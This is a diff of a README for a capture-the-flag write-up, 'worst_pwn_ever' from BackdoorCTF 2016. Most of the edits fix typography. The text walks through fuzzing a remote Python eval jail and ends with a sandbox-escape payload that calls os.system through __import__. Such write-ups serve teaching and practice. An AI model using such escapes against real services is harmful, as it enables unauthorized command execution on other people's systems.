Rodbert/writeups/BackdoorCTF_2016/worst_pwn_ever/README.md

 ```

 ## Solution
-After establishing a~connection to the given server a~prompt is returned.
+After establishing a connection to the given server a prompt is returned.
 Let's try some random fuzzing...
-First let's see what happens when we press ```CTRL+D```
+First let's see what happens when we press `CTRL+D`
 right away:

 ```
 > EOFError: EOF when reading a line
 --> WHAT ARE YOU DOING HERE? >-[
 ```
-Let's check if it is a~system shell:
+Let's check if it is a system shell:
 ```
 > echo x
 SyntaxError: unexpected EOF while parsing (<string>, line 1) --> WHAT ARE YOU DOING HERE? >-[
 ```
-No, it's definitely not a~system shell.
-It looks like a~Python interpreter.
+No, it's definitely not a system shell.
+It looks like a Python interpreter.
 Let's check this theory then:
 ```
 > 1+1
 ```
-No response, no error ---~it looks promising.
+No response, no error - it looks promising.
 Let's check then if we can see some Python errors:
 ```
 > 1+'x'*[]
 TypeError: can't multiply sequence by non-int of type 'list'
 ```
 Bingo!
-If it really is an old ```eval``` jail, then
+If it really is an old `eval` jail, then
-we could escape using a~classic builtin hacks.
+we could escape using a classic builtin hacks.
 Let's check that:
 ```
 > str(__import__('os').system('echo x'))